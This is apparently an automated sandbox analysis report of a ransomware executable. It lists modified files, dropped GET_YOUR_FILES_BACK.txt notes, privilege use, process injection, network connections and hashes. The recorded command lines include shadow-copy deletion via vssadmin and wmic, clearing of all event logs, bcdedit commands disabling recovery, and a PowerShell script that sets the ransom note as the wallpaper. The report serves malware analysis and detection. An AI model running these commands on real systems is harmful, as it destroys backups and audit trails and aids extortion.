File opened for modification C:\Program Files\Microsoft Office\root\vreg\dcfmui.msi.16.en-us.vreg.dat C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg1a.jpg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_18.svg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSplashLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 1644 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\SYSTEM32\cmd.exe
PID 352 wrote to memory of 1516 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 352 wrote to memory of 1516 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 2444 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3456 wrote to memory of 2444 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2040 wrote to memory of 4740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2040 wrote to memory of 4740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 112 wrote to memory of 4104 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 112 wrote to memory of 4104 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1040 wrote to memory of 4900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1040 wrote to memory of 4900 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 13656 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1644 wrote to memory of 13656 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 13656 wrote to memory of 13548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 13656 wrote to memory of 13548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 13656 wrote to memory of 13448 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 13656 wrote to memory of 13448 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1347122807.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country  Destination           Domain                        Proto
NL       8.238.177.126:80                                    tcp
US       8.8.8.8:53            103.169.127.40.in-addr.arpa   udp
US       8.8.8.8:53            217.106.137.52.in-addr.arpa   udp
US       8.8.8.8:53            126.20.238.8.in-addr.arpa     udp
US       8.8.8.8:53            56.126.166.20.in-addr.arpa    udp
US       8.8.8.8:53            254.152.241.8.in-addr.arpa    udp
US       20.189.173.5:443                                    tcp
US       8.8.8.8:53            140.32.126.40.in-addr.arpa    udp
US       8.8.8.8:53            95.221.229.192.in-addr.arpa   udp
US       8.8.8.8:53            28.118.140.52.in-addr.arpa    udp
US       8.8.8.8:53            233.141.123.20.in-addr.arpa   udp
US       8.8.8.8:53            58.55.71.13.in-addr.arpa      udp
NL       8.238.177.126:80                                    tcp
US       8.8.8.8:53            163.252.72.23.in-addr.arpa    udp
NL       8.238.177.126:80                                    tcp
NL       173.223.113.164:443                                 tcp
NL       173.223.113.131:80                                  tcp
US       131.253.33.203:80                                   tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_juma2lqh.xlc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1516-146-0x0000022191340000-0x0000022191362000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/1516-793-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-832-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-1540-0x0000022191260000-0x0000022191270000-memory.dmp

memory/1516-3346-0x00000221A94E0000-0x00000221A96FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/13656-24866-0x000001D6CE290000-0x000001D6CE2A0000-memory.dmp

memory/13656-24868-0x000001D6CE290000-0x000001D6CE2A0000-memory.dmp